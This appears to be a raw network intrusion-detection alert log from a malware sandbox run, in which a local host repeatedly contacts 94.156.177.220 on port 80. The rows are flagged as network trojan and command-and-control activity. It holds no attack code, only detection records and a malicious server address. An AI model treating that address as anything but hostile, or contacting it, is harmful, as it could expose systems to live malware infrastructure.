                      2024-10-25T10:21:56.901726+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450094TCP
                      2024-10-25T10:21:58.172981+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450095TCP
                      2024-10-25T10:21:59.361507+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450096TCP
                      2024-10-25T10:22:00.545385+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450097TCP
                      2024-10-25T10:22:02.039544+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450098TCP
                      2024-10-25T10:22:03.146388+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450099TCP
                      2024-10-25T10:22:05.416568+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450100TCP
                      2024-10-25T10:22:06.546217+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450101TCP
                      2024-10-25T10:22:07.827411+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450102TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-25T10:20:05.061102+020020243131Malware Command and Control Activity Detected192.168.2.44973294.156.177.22080TCP
                      2024-10-25T10:20:06.219416+020020243131Malware Command and Control Activity Detected192.168.2.44973394.156.177.22080TCP
                      2024-10-25T10:20:07.328677+020020243131Malware Command and Control Activity Detected192.168.2.44973494.156.177.22080TCP
                      2024-10-25T10:20:09.431887+020020243131Malware Command and Control Activity Detected192.168.2.44973594.156.177.22080TCP
                      2024-10-25T10:20:10.553813+020020243131Malware Command and Control Activity Detected192.168.2.44973694.156.177.22080TCP
                      2024-10-25T10:20:11.713418+020020243131Malware Command and Control Activity Detected192.168.2.44973794.156.177.22080TCP
                      2024-10-25T10:20:13.293592+020020243131Malware Command and Control Activity Detected192.168.2.44973894.156.177.22080TCP
                      2024-10-25T10:20:14.398997+020020243131Malware Command and Control Activity Detected192.168.2.44973994.156.177.22080TCP
                      2024-10-25T10:20:15.568040+020020243131Malware Command and Control Activity Detected192.168.2.44974094.156.177.22080TCP
                      2024-10-25T10:20:16.716991+020020243131Malware Command and Control Activity Detected192.168.2.44974194.156.177.22080TCP
                      2024-10-25T10:20:17.832440+020020243131Malware Command and Control Activity Detected192.168.2.44974494.156.177.22080TCP
                      2024-10-25T10:20:19.151355+020020243131Malware Command and Control Activity Detected192.168.2.44974794.156.177.22080TCP
                      2024-10-25T10:20:21.110799+020020243131Malware Command and Control Activity Detected192.168.2.44974994.156.177.22080TCP
                      2024-10-25T10:20:22.349091+020020243131Malware Command and Control Activity Detected192.168.2.44975194.156.177.22080TCP
                      2024-10-25T10:20:23.513082+020020243131Malware Command and Control Activity Detected192.168.2.44975294.156.177.22080TCP
                      2024-10-25T10:20:24.651338+020020243131Malware Command and Control Activity Detected192.168.2.44975394.156.177.22080TCP
                      2024-10-25T10:20:25.786050+020020243131Malware Command and Control Activity Detected192.168.2.44975494.156.177.22080TCP
                      2024-10-25T10:20:26.954108+020020243131Malware Command and Control Activity Detected192.168.2.44975594.156.177.22080TCP
                      2024-10-25T10:20:28.695330+020020243131Malware Command and Control Activity Detected192.168.2.44975694.156.177.22080TCP
                      2024-10-25T10:20:30.839601+020020243131Malware Command and Control Activity Detected192.168.2.44975794.156.177.22080TCP
                      2024-10-25T10:20:32.009821+020020243131Malware Command and Control Activity Detected192.168.2.44975894.156.177.22080TCP
                      2024-10-25T10:20:33.139480+020020243131Malware Command and Control Activity Detected192.168.2.44975994.156.177.22080TCP
                      2024-10-25T10:20:34.649766+020020243131Malware Command and Control Activity Detected192.168.2.44976094.156.177.22080TCP
                      2024-10-25T10:20:35.764613+020020243131Malware Command and Control Activity Detected192.168.2.44976194.156.177.22080TCP
                      2024-10-25T10:20:36.884487+020020243131Malware Command and Control Activity Detected192.168.2.44976294.156.177.22080TCP
                      2024-10-25T10:20:38.036103+020020243131Malware Command and Control Activity Detected192.168.2.44976394.156.177.22080TCP
                      2024-10-25T10:20:39.182221+020020243131Malware Command and Control Activity Detected192.168.2.44976494.156.177.22080TCP
                      2024-10-25T10:20:40.795930+020020243131Malware Command and Control Activity Detected192.168.2.44976594.156.177.22080TCP
                      2024-10-25T10:20:42.080957+020020243131Malware Command and Control Activity Detected192.168.2.44976694.156.177.22080TCP
                      2024-10-25T10:20:43.413726+020020243131Malware Command and Control Activity Detected192.168.2.44976794.156.177.22080TCP
                      2024-10-25T10:20:44.566821+020020243131Malware Command and Control Activity Detected192.168.2.44976894.156.177.22080TCP
                      2024-10-25T10:20:45.730458+020020243131Malware Command and Control Activity Detected192.168.2.44976994.156.177.22080TCP
                      2024-10-25T10:20:46.935092+020020243131Malware Command and Control Activity Detected192.168.2.44977094.156.177.22080TCP
                      2024-10-25T10:20:48.041946+020020243131Malware Command and Control Activity Detected192.168.2.44977194.156.177.22080TCP
                      2024-10-25T10:20:49.291568+020020243131Malware Command and Control Activity Detected192.168.2.44977294.156.177.22080TCP
                      2024-10-25T10:20:50.444267+020020243131Malware Command and Control Activity Detected192.168.2.44977394.156.177.22080TCP
                      2024-10-25T10:20:51.603400+020020243131Malware Command and Control Activity Detected192.168.2.44977494.156.177.22080TCP
                      2024-10-25T10:20:53.016672+020020243131Malware Command and Control Activity Detected192.168.2.44977594.156.177.22080TCP
                      2024-10-25T10:20:54.133034+020020243131Malware Command and Control Activity Detected192.168.2.44977694.156.177.22080TCP
                      2024-10-25T10:20:55.280818+020020243131Malware Command and Control Activity Detected192.168.2.44977794.156.177.22080TCP
                      2024-10-25T10:20:56.431956+020020243131Malware Command and Control Activity Detected192.168.2.44977994.156.177.22080TCP
                      2024-10-25T10:20:57.593283+020020243131Malware Command and Control Activity Detected192.168.2.44978094.156.177.22080TCP
                      2024-10-25T10:20:59.001743+020020243131Malware Command and Control Activity Detected192.168.2.44978294.156.177.22080TCP
                      2024-10-25T10:21:00.130045+020020243131Malware Command and Control Activity Detected192.168.2.44979394.156.177.22080TCP
                      2024-10-25T10:21:01.269869+020020243131Malware Command and Control Activity Detected192.168.2.44979994.156.177.22080TCP
                      2024-10-25T10:21:02.412807+020020243131Malware Command and Control Activity Detected192.168.2.44980594.156.177.22080TCP
                      2024-10-25T10:21:03.549599+020020243131Malware Command and Control Activity Detected192.168.2.44981194.156.177.22080TCP
                      2024-10-25T10:21:05.290132+020020243131Malware Command and Control Activity Detected192.168.2.44982294.156.177.22080TCP
                      2024-10-25T10:21:06.443742+020020243131Malware Command and Control Activity Detected192.168.2.44982894.156.177.22080TCP
                      2024-10-25T10:21:07.670809+020020243131Malware Command and Control Activity Detected192.168.2.44983694.156.177.22080TCP
                      2024-10-25T10:21:08.796273+020020243131Malware Command and Control Activity Detected192.168.2.44984294.156.177.22080TCP
                      2024-10-25T10:21:09.928770+020020243131Malware Command and Control Activity Detected192.168.2.44985194.156.177.22080TCP
                      2024-10-25T10:21:11.186518+020020243131Malware Command and Control Activity Detected192.168.2.44985894.156.177.22080TCP
                      2024-10-25T10:21:12.311125+020020243131Malware Command and Control Activity Detected192.168.2.44986494.156.177.22080TCP
                      2024-10-25T10:21:13.646861+020020243131Malware Command and Control Activity Detected192.168.2.44987194.156.177.22080TCP
                      2024-10-25T10:21:14.786667+020020243131Malware Command and Control Activity Detected192.168.2.44987794.156.177.22080TCP
                      2024-10-25T10:21:15.924397+020020243131Malware Command and Control Activity Detected192.168.2.44988394.156.177.22080TCP
                      2024-10-25T10:21:17.523591+020020243131Malware Command and Control Activity Detected192.168.2.44989494.156.177.22080TCP
                      2024-10-25T10:21:18.678850+020020243131Malware Command and Control Activity Detected192.168.2.44990094.156.177.22080TCP
                      2024-10-25T10:21:20.169405+020020243131Malware Command and Control Activity Detected192.168.2.44991094.156.177.22080TCP
                      2024-10-25T10:21:21.278945+020020243131Malware Command and Control Activity Detected192.168.2.44991794.156.177.22080TCP
                      2024-10-25T10:21:22.431466+020020243131Malware Command and Control Activity Detected192.168.2.44992494.156.177.22080TCP
                      2024-10-25T10:21:23.917885+020020243131Malware Command and Control Activity Detected192.168.2.44993494.156.177.22080TCP
                      2024-10-25T10:21:25.060705+020020243131Malware Command and Control Activity Detected192.168.2.44994094.156.177.22080TCP
                      2024-10-25T10:21:26.544494+020020243131Malware Command and Control Activity Detected192.168.2.44994794.156.177.22080TCP
                      2024-10-25T10:21:27.664575+020020243131Malware Command and Control Activity Detected192.168.2.44995494.156.177.22080TCP
                      2024-10-25T10:21:28.795766+020020243131Malware Command and Control Activity Detected192.168.2.44996394.156.177.22080TCP
                      2024-10-25T10:21:29.966249+020020243131Malware Command and Control Activity Detected192.168.2.44996994.156.177.22080TCP
                      2024-10-25T10:21:31.093840+020020243131Malware Command and Control Activity Detected192.168.2.44997594.156.177.22080TCP
                      2024-10-25T10:21:32.205975+020020243131Malware Command and Control Activity Detected192.168.2.44998594.156.177.22080TCP
                      2024-10-25T10:21:33.334821+020020243131Malware Command and Control Activity Detected192.168.2.44999194.156.177.22080TCP
                      2024-10-25T10:21:34.473111+020020243131Malware Command and Control Activity Detected192.168.2.44999894.156.177.22080TCP
                      2024-10-25T10:21:35.623881+020020243131Malware Command and Control Activity Detected192.168.2.45000594.156.177.22080TCP
                      2024-10-25T10:21:36.765800+020020243131Malware Command and Control Activity Detected192.168.2.45001494.156.177.22080TCP
                      2024-10-25T10:21:37.890035+020020243131Malware Command and Control Activity Detected192.168.2.45002194.156.177.22080TCP
                      2024-10-25T10:21:39.040400+020020243131Malware Command and Control Activity Detected192.168.2.45002794.156.177.22080TCP
                      2024-10-25T10:21:40.344341+020020243131Malware Command and Control Activity Detected192.168.2.45003394.156.177.22080TCP
                      2024-10-25T10:21:41.490818+020020243131Malware Command and Control Activity Detected192.168.2.45003994.156.177.22080TCP
                      2024-10-25T10:21:42.628356+020020243131Malware Command and Control Activity Detected192.168.2.45005094.156.177.22080TCP
                      2024-10-25T10:21:43.771661+020020243131Malware Command and Control Activity Detected192.168.2.45005694.156.177.22080TCP
                      2024-10-25T10:21:44.922014+020020243131Malware Command and Control Activity Detected192.168.2.45006294.156.177.22080TCP
                      2024-10-25T10:21:46.047555+020020243131Malware Command and Control Activity Detected192.168.2.45007394.156.177.22080TCP
                      2024-10-25T10:21:47.209475+020020243131Malware Command and Control Activity Detected192.168.2.45007894.156.177.22080TCP
                      2024-10-25T10:21:48.343222+020020243131Malware Command and Control Activity Detected192.168.2.45008594.156.177.22080TCP
                      2024-10-25T10:21:49.489044+020020243131Malware Command and Control Activity Detected192.168.2.45008894.156.177.22080TCP
                      2024-10-25T10:21:50.627196+020020243131Malware Command and Control Activity Detected192.168.2.45008994.156.177.22080TCP
                      2024-10-25T10:21:52.356229+020020243131Malware Command and Control Activity Detected192.168.2.45009094.156.177.22080TCP
                      2024-10-25T10:21:53.474653+020020243131Malware Command and Control Activity Detected192.168.2.45009194.156.177.22080TCP
                      2024-10-25T10:21:54.628216+020020243131Malware Command and Control Activity Detected192.168.2.45009294.156.177.22080TCP
                      2024-10-25T10:21:55.755063+020020243131Malware Command and Control Activity Detected192.168.2.45009394.156.177.22080TCP
                      2024-10-25T10:21:56.895578+020020243131Malware Command and Control Activity Detected192.168.2.45009494.156.177.22080TCP
                      2024-10-25T10:21:58.166256+020020243131Malware Command and Control Activity Detected192.168.2.45009594.156.177.22080TCP
                      2024-10-25T10:21:59.355701+020020243131Malware Command and Control Activity Detected192.168.2.45009694.156.177.22080TCP
                      2024-10-25T10:22:00.539507+020020243131Malware Command and Control Activity Detected192.168.2.45009794.156.177.22080TCP
                      2024-10-25T10:22:02.033727+020020243131Malware Command and Control Activity Detected192.168.2.45009894.156.177.22080TCP
                      2024-10-25T10:22:03.140267+020020243131Malware Command and Control Activity Detected192.168.2.45009994.156.177.22080TCP
                      2024-10-25T10:22:05.410348+020020243131Malware Command and Control Activity Detected192.168.2.45010094.156.177.22080TCP
                      2024-10-25T10:22:06.540301+020020243131Malware Command and Control Activity Detected192.168.2.45010194.156.177.22080TCP
                      2024-10-25T10:22:07.717612+020020243131Malware Command and Control Activity Detected192.168.2.45010294.156.177.22080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-25T10:20:05.061102+020020243181Malware Command and Control Activity Detected192.168.2.44973294.156.177.22080TCP
                      2024-10-25T10:20:06.219416+020020243181Malware Command and Control Activity Detected192.168.2.44973394.156.177.22080TCP
                      2024-10-25T10:20:07.328677+020020243181Malware Command and Control Activity Detected192.168.2.44973494.156.177.22080TCP
                      2024-10-25T10:20:09.431887+020020243181Malware Command and Control Activity Detected192.168.2.44973594.156.177.22080TCP
                      2024-10-25T10:20:10.553813+020020243181Malware Command and Control Activity Detected192.168.2.44973694.156.177.22080TCP
                      2024-10-25T10:20:11.713418+020020243181Malware Command and Control Activity Detected192.168.2.44973794.156.177.22080TCP
                      2024-10-25T10:20:13.293592+020020243181Malware Command and Control Activity Detected192.168.2.44973894.156.177.22080TCP
                      2024-10-25T10:20:14.398997+020020243181Malware Command and Control Activity Detected192.168.2.44973994.156.177.22080TCP
                      2024-10-25T10:20:15.568040+020020243181Malware Command and Control Activity Detected192.168.2.44974094.156.177.22080TCP
                      2024-10-25T10:20:16.716991+020020243181Malware Command and Control Activity Detected192.168.2.44974194.156.177.22080TCP
                      2024-10-25T10:20:17.832440+020020243181Malware Command and Control Activity Detected192.168.2.44974494.156.177.22080TCP
                      2024-10-25T10:20:19.151355+020020243181Malware Command and Control Activity Detected192.168.2.44974794.156.177.22080TCP
                      2024-10-25T10:20:21.110799+020020243181Malware Command and Control Activity Detected192.168.2.44974994.156.177.22080TCP
                      2024-10-25T10:20:22.349091+020020243181Malware Command and Control Activity Detected192.168.2.44975194.156.177.22080TCP
                      2024-10-25T10:20:23.513082+020020243181Malware Command and Control Activity Detected192.168.2.44975294.156.177.22080TCP
                      2024-10-25T10:20:24.651338+020020243181Malware Command and Control Activity Detected192.168.2.44975394.156.177.22080TCP
                      2024-10-25T10:20:25.786050+020020243181Malware Command and Control Activity Detected192.168.2.44975494.156.177.22080TCP
                      2024-10-25T10:20:26.954108+020020243181Malware Command and Control Activity Detected192.168.2.44975594.156.177.22080TCP
                      2024-10-25T10:20:28.695330+020020243181Malware Command and Control Activity Detected192.168.2.44975694.156.177.22080TCP
                      2024-10-25T10:20:30.839601+020020243181Malware Command and Control Activity Detected192.168.2.44975794.156.177.22080TCP
                      2024-10-25T10:20:32.009821+020020243181Malware Command and Control Activity Detected192.168.2.44975894.156.177.22080TCP
                      2024-10-25T10:20:33.139480+020020243181Malware Command and Control Activity Detected192.168.2.44975994.156.177.22080TCP
                      2024-10-25T10:20:34.649766+020020243181Malware Command and Control Activity Detected192.168.2.44976094.156.177.22080TCP
                      2024-10-25T10:20:35.764613+020020243181Malware Command and Control Activity Detected192.168.2.44976194.156.177.22080TCP
                      2024-10-25T10:20:36.884487+020020243181Malware Command and Control Activity Detected192.168.2.44976294.156.177.22080TCP
                      2024-10-25T10:20:38.036103+020020243181Malware Command and Control Activity Detected192.168.2.44976394.156.177.22080TCP
                      2024-10-25T10:20:39.182221+020020243181Malware Command and Control Activity Detected192.168.2.44976494.156.177.22080TCP
                      2024-10-25T10:20:40.795930+020020243181Malware Command and Control Activity Detected192.168.2.44976594.156.177.22080TCP
                      2024-10-25T10:20:42.080957+020020243181Malware Command and Control Activity Detected192.168.2.44976694.156.177.22080TCP
                      2024-10-25T10:20:43.413726+020020243181Malware Command and Control Activity Detected192.168.2.44976794.156.177.22080TCP
                      2024-10-25T10:20:44.566821+020020243181Malware Command and Control Activity Detected192.168.2.44976894.156.177.22080TCP
                      2024-10-25T10:20:45.730458+020020243181Malware Command and Control Activity Detected192.168.2.44976994.156.177.22080TCP
                      2024-10-25T10:20:46.935092+020020243181Malware Command and Control Activity Detected192.168.2.44977094.156.177.22080TCP
                      2024-10-25T10:20:48.041946+020020243181Malware Command and Control Activity Detected192.168.2.44977194.156.177.22080TCP
                      2024-10-25T10:20:49.291568+020020243181Malware Command and Control Activity Detected192.168.2.44977294.156.177.22080TCP
                      2024-10-25T10:20:50.444267+020020243181Malware Command and Control Activity Detected192.168.2.44977394.156.177.22080TCP
                      2024-10-25T10:20:51.603400+020020243181Malware Command and Control Activity Detected192.168.2.44977494.156.177.22080TCP
                      2024-10-25T10:20:53.016672+020020243181Malware Command and Control Activity Detected192.168.2.44977594.156.177.22080TCP
                      2024-10-25T10:20:54.133034+020020243181Malware Command and Control Activity Detected192.168.2.44977694.156.177.22080TCP
                      2024-10-25T10:20:55.280818+020020243181Malware Command and Control Activity Detected192.168.2.44977794.156.177.22080TCP
                      2024-10-25T10:20:56.431956+020020243181Malware Command and Control Activity Detected192.168.2.44977994.156.177.22080TCP
                      2024-10-25T10:20:57.593283+020020243181Malware Command and Control Activity Detected192.168.2.44978094.156.177.22080TCP
                      2024-10-25T10:20:59.001743+020020243181Malware Command and Control Activity Detected192.168.2.44978294.156.177.22080TCP
                      2024-10-25T10:21:00.130045+020020243181Malware Command and Control Activity Detected192.168.2.44979394.156.177.22080TCP
                      2024-10-25T10:21:01.269869+020020243181Malware Command and Control Activity Detected192.168.2.44979994.156.177.22080TCP
                      2024-10-25T10:21:02.412807+020020243181Malware Command and Control Activity Detected192.168.2.44980594.156.177.22080TCP
                      2024-10-25T10:21:03.549599+020020243181Malware Command and Control Activity Detected192.168.2.44981194.156.177.22080TCP
                      2024-10-25T10:21:05.290132+020020243181Malware Command and Control Activity Detected192.168.2.44982294.156.177.22080TCP
                      2024-10-25T10:21:06.443742+020020243181Malware Command and Control Activity Detected192.168.2.44982894.156.177.22080TCP
                      2024-10-25T10:21:07.670809+020020243181Malware Command and Control Activity Detected192.168.2.44983694.156.177.22080TCP
                      2024-10-25T10:21:08.796273+020020243181Malware Command and Control Activity Detected192.168.2.44984294.156.177.22080TCP
                      2024-10-25T10:21:09.928770+020020243181Malware Command and Control Activity Detected192.168.2.44985194.156.177.22080TCP
                      2024-10-25T10:21:11.186518+020020243181Malware Command and Control Activity Detected192.168.2.44985894.156.177.22080TCP
                      2024-10-25T10:21:12.311125+020020243181Malware Command and Control Activity Detected192.168.2.44986494.156.177.22080TCP
                      2024-10-25T10:21:13.646861+020020243181Malware Command and Control Activity Detected192.168.2.44987194.156.177.22080TCP
                      2024-10-25T10:21:14.786667+020020243181Malware Command and Control Activity Detected192.168.2.44987794.156.177.22080TCP
                      2024-10-25T10:21:15.924397+020020243181Malware Command and Control Activity Detected192.168.2.44988394.156.177.22080TCP
                      2024-10-25T10:21:17.523591+020020243181Malware Command and Control Activity Detected192.168.2.44989494.156.177.22080TCP
                      2024-10-25T10:21:18.678850+020020243181Malware Command and Control Activity Detected192.168.2.44990094.156.177.22080TCP
                      2024-10-25T10:21:20.169405+020020243181Malware Command and Control Activity Detected192.168.2.44991094.156.177.22080TCP
                      2024-10-25T10:21:21.278945+020020243181Malware Command and Control Activity Detected192.168.2.44991794.156.177.22080TCP
                      2024-10-25T10:21:22.431466+020020243181Malware Command and Control Activity Detected192.168.2.44992494.156.177.22080TCP
                      2024-10-25T10:21:23.917885+020020243181Malware Command and Control Activity Detected192.168.2.44993494.156.177.22080TCP
                      2024-10-25T10:21:25.060705+020020243181Malware Command and Control Activity Detected192.168.2.44994094.156.177.22080TCP
                      2024-10-25T10:21:26.544494+020020243181Malware Command and Control Activity Detected192.168.2.44994794.156.177.22080TCP
                      2024-10-25T10:21:27.664575+020020243181Malware Command and Control Activity Detected192.168.2.44995494.156.177.22080TCP
                      2024-10-25T10:21:28.795766+020020243181Malware Command and Control Activity Detected192.168.2.44996394.156.177.22080TCP
                      2024-10-25T10:21:29.966249+020020243181Malware Command and Control Activity Detected192.168.2.44996994.156.177.22080TCP
                      2024-10-25T10:21:31.093840+020020243181Malware Command and Control Activity Detected192.168.2.44997594.156.177.22080TCP
                      2024-10-25T10:21:32.205975+020020243181Malware Command and Control Activity Detected192.168.2.44998594.156.177.22080TCP
                      2024-10-25T10:21:33.334821+020020243181Malware Command and Control Activity Detected192.168.2.44999194.156.177.22080TCP
                      2024-10-25T10:21:34.473111+020020243181Malware Command and Control Activity Detected192.168.2.44999894.156.177.22080TCP
                      2024-10-25T10:21:35.623881+020020243181Malware Command and Control Activity Detected192.168.2.45000594.156.177.22080TCP
                      2024-10-25T10:21:36.765800+020020243181Malware Command and Control Activity Detected192.168.2.45001494.156.177.22080TCP
                      2024-10-25T10:21:37.890035+020020243181Malware Command and Control Activity Detected192.168.2.45002194.156.177.22080TCP
                      2024-10-25T10:21:39.040400+020020243181Malware Command and Control Activity Detected192.168.2.45002794.156.177.22080TCP
                      2024-10-25T10:21:40.344341+020020243181Malware Command and Control Activity Detected192.168.2.45003394.156.177.22080TCP
                      2024-10-25T10:21:41.490818+020020243181Malware Command and Control Activity Detected192.168.2.45003994.156.177.22080TCP
                      2024-10-25T10:21:42.628356+020020243181Malware Command and Control Activity Detected192.168.2.45005094.156.177.22080TCP
                      2024-10-25T10:21:43.771661+020020243181Malware Command and Control Activity Detected192.168.2.45005694.156.177.22080TCP
                      2024-10-25T10:21:44.922014+020020243181Malware Command and Control Activity Detected192.168.2.45006294.156.177.22080TCP
                      2024-10-25T10:21:46.047555+020020243181Malware Command and Control Activity Detected192.168.2.45007394.156.177.22080TCP
                      2024-10-25T10:21:47.209475+020020243181Malware Command and Control Activity Detected192.168.2.45007894.156.177.22080TCP
                      2024-10-25T10:21:48.343222+020020243181Malware Command and Control Activity Detected192.168.2.45008594.156.177.22080TCP
                      2024-10-25T10:21:49.489044+020020243181Malware Command and Control Activity Detected192.168.2.45008894.156.177.22080TCP
                      2024-10-25T10:21:50.627196+020020243181Malware Command and Control Activity Detected192.168.2.45008994.156.177.22080TCP
                      2024-10-25T10:21:52.356229+020020243181Malware Command and Control Activity Detected192.168.2.45009094.156.177.22080TCP
                      2024-10-25T10:21:53.474653+020020243181Malware Command and Control Activity Detected192.168.2.45009194.156.177.22080TCP
                      2024-10-25T10:21:54.628216+020020243181Malware Command and Control Activity Detected192.168.2.45009294.156.177.22080TCP
                      2024-10-25T10:21:55.755063+020020243181Malware Command and Control Activity Detected192.168.2.45009394.156.177.22080TCP
                      2024-10-25T10:21:56.895578+020020243181Malware Command and Control Activity Detected192.168.2.45009494.156.177.22080TCP
                      2024-10-25T10:21:58.166256+020020243181Malware Command and Control Activity Detected192.168.2.45009594.156.177.22080TCP
                      2024-10-25T10:21:59.355701+020020243181Malware Command and Control Activity Detected192.168.2.45009694.156.177.22080TCP
                      2024-10-25T10:22:00.539507+020020243181Malware Command and Control Activity Detected192.168.2.45009794.156.177.22080TCP
                      2024-10-25T10:22:02.033727+020020243181Malware Command and Control Activity Detected192.168.2.45009894.156.177.22080TCP
                      2024-10-25T10:22:03.140267+020020243181Malware Command and Control Activity Detected192.168.2.45009994.156.177.22080TCP
                      2024-10-25T10:22:05.410348+020020243181Malware Command and Control Activity Detected192.168.2.45010094.156.177.22080TCP
                      2024-10-25T10:22:06.540301+020020243181Malware Command and Control Activity Detected192.168.2.45010194.156.177.22080TCP
                      2024-10-25T10:22:07.717612+020020243181Malware Command and Control Activity Detected192.168.2.45010294.156.177.22080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-25T10:20:01.424022+020020216411A Network Trojan was detected192.168.2.44973094.156.177.22080TCP
                      2024-10-25T10:20:03.047948+020020216411A Network Trojan was detected192.168.2.44973194.156.177.22080TCP
                      2024-10-25T10:20:04.092936+020020216411A Network Trojan was detected192.168.2.44973294.156.177.22080TCP
                      2024-10-25T10:20:05.231108+020020216411A Network Trojan was detected192.168.2.44973394.156.177.22080TCP
                      2024-10-25T10:20:06.375575+020020216411A Network Trojan was detected192.168.2.44973494.156.177.22080TCP
                      2024-10-25T10:20:07.485394+020020216411A Network Trojan was detected192.168.2.44973594.156.177.22080TCP
                      2024-10-25T10:20:09.597188+020020216411A Network Trojan was detected192.168.2.44973694.156.177.22080TCP
                      2024-10-25T10:20:10.715160+020020216411A Network Trojan was detected192.168.2.44973794.156.177.22080TCP
                      2024-10-25T10:20:12.310127+020020216411A Network Trojan was detected192.168.2.44973894.156.177.22080TCP
                      2024-10-25T10:20:13.452612+020020216411A Network Trojan was detected192.168.2.44973994.156.177.22080TCP
                      2024-10-25T10:20:14.593029+020020216411A Network Trojan was detected192.168.2.44974094.156.177.22080TCP
                      2024-10-25T10:20:15.751617+020020216411A Network Trojan was detected192.168.2.44974194.156.177.22080TCP
                      2024-10-25T10:20:16.872789+020020216411A Network Trojan was detected192.168.2.44974494.156.177.22080TCP
                      2024-10-25T10:20:18.205156+020020216411A Network Trojan was detected192.168.2.44974794.156.177.22080TCP
                      2024-10-25T10:20:19.310464+020020216411A Network Trojan was detected192.168.2.44974994.156.177.22080TCP
                      2024-10-25T10:20:21.380407+020020216411A Network Trojan was detected192.168.2.44975194.156.177.22080TCP
                      2024-10-25T10:20:22.549457+020020216411A Network Trojan was detected192.168.2.44975294.156.177.22080TCP
                      2024-10-25T10:20:23.684073+020020216411A Network Trojan was detected192.168.2.44975394.156.177.22080TCP
                      2024-10-25T10:20:24.816660+020020216411A Network Trojan was detected192.168.2.44975494.156.177.22080TCP
                      2024-10-25T10:20:25.965151+020020216411A Network Trojan was detected192.168.2.44975594.156.177.22080TCP
                      2024-10-25T10:20:27.717963+020020216411A Network Trojan was detected192.168.2.44975694.156.177.22080TCP
                      2024-10-25T10:20:29.863609+020020216411A Network Trojan was detected192.168.2.44975794.156.177.22080TCP
                      2024-10-25T10:20:30.997406+020020216411A Network Trojan was detected192.168.2.44975894.156.177.22080TCP
                      2024-10-25T10:20:32.176322+020020216411A Network Trojan was detected192.168.2.44975994.156.177.22080TCP
                      2024-10-25T10:20:33.687799+020020216411A Network Trojan was detected192.168.2.44976094.156.177.22080TCP
                      2024-10-25T10:20:34.810261+020020216411A Network Trojan was detected192.168.2.44976194.156.177.22080TCP
                      2024-10-25T10:20:35.916782+020020216411A Network Trojan was detected192.168.2.44976294.156.177.22080TCP
                      2024-10-25T10:20:37.046303+020020216411A Network Trojan was detected192.168.2.44976394.156.177.22080TCP
                      2024-10-25T10:20:38.200499+020020216411A Network Trojan was detected192.168.2.44976494.156.177.22080TCP
                      2024-10-25T10:20:39.822243+020020216411A Network Trojan was detected192.168.2.44976594.156.177.22080TCP
                      2024-10-25T10:20:40.950583+020020216411A Network Trojan was detected192.168.2.44976694.156.177.22080TCP
                      2024-10-25T10:20:42.434571+020020216411A Network Trojan was detected192.168.2.44976794.156.177.22080TCP
                      2024-10-25T10:20:43.576012+020020216411A Network Trojan was detected192.168.2.44976894.156.177.22080TCP
                      2024-10-25T10:20:44.753726+020020216411A Network Trojan was detected192.168.2.44976994.156.177.22080TCP
                      2024-10-25T10:20:45.967783+020020216411A Network Trojan was detected192.168.2.44977094.156.177.22080TCP
                      2024-10-25T10:20:47.090625+020020216411A Network Trojan was detected192.168.2.44977194.156.177.22080TCP
                      2024-10-25T10:20:48.628754+020020216411A Network Trojan was detected192.168.2.44977294.156.177.22080TCP
                      2024-10-25T10:20:49.450869+020020216411A Network Trojan was detected192.168.2.44977394.156.177.22080TCP
                      2024-10-25T10:20:50.632516+020020216411A Network Trojan was detected192.168.2.44977494.156.177.22080TCP
                      2024-10-25T10:20:52.029076+020020216411A Network Trojan was detected192.168.2.44977594.156.177.22080TCP
                      2024-10-25T10:20:53.168380+020020216411A Network Trojan was detected192.168.2.44977694.156.177.22080TCP
                      2024-10-25T10:20:54.305428+020020216411A Network Trojan was detected192.168.2.44977794.156.177.22080TCP
                      2024-10-25T10:20:55.471024+020020216411A Network Trojan was detected192.168.2.44977994.156.177.22080TCP
                      2024-10-25T10:20:56.594180+020020216411A Network Trojan was detected192.168.2.44978094.156.177.22080TCP
                      2024-10-25T10:20:58.015959+020020216411A Network Trojan was detected192.168.2.44978294.156.177.22080TCP
                      2024-10-25T10:20:59.156243+020020216411A Network Trojan was detected192.168.2.44979394.156.177.22080TCP
                      2024-10-25T10:21:00.311298+020020216411A Network Trojan was detected192.168.2.44979994.156.177.22080TCP
                      2024-10-25T10:21:01.419074+020020216411A Network Trojan was detected192.168.2.44980594.156.177.22080TCP
                      2024-10-25T10:21:02.575992+020020216411A Network Trojan was detected192.168.2.44981194.156.177.22080TCP
                      2024-10-25T10:21:04.300437+020020216411A Network Trojan was detected192.168.2.44982294.156.177.22080TCP
                      2024-10-25T10:21:05.450685+020020216411A Network Trojan was detected192.168.2.44982894.156.177.22080TCP
                      2024-10-25T10:21:06.702578+020020216411A Network Trojan was detected192.168.2.44983694.156.177.22080TCP
                      2024-10-25T10:21:07.823534+020020216411A Network Trojan was detected192.168.2.44984294.156.177.22080TCP
                      2024-10-25T10:21:08.970566+020020216411A Network Trojan was detected192.168.2.44985194.156.177.22080TCP
                      2024-10-25T10:21:10.210497+020020216411A Network Trojan was detected192.168.2.44985894.156.177.22080TCP
                      2024-10-25T10:21:11.347066+020020216411A Network Trojan was detected192.168.2.44986494.156.177.22080TCP
                      2024-10-25T10:21:12.693350+020020216411A Network Trojan was detected192.168.2.44987194.156.177.22080TCP
                      2024-10-25T10:21:13.812456+020020216411A Network Trojan was detected192.168.2.44987794.156.177.22080TCP
                      2024-10-25T10:21:14.957762+020020216411A Network Trojan was detected192.168.2.44988394.156.177.22080TCP
                      2024-10-25T10:21:16.552285+020020216411A Network Trojan was detected192.168.2.44989494.156.177.22080TCP
                      2024-10-25T10:21:17.694981+020020216411A Network Trojan was detected192.168.2.44990094.156.177.22080TCP
                      2024-10-25T10:21:19.204894+020020216411A Network Trojan was detected192.168.2.44991094.156.177.22080TCP
                      2024-10-25T10:21:20.326057+020020216411A Network Trojan was detected192.168.2.44991794.156.177.22080TCP
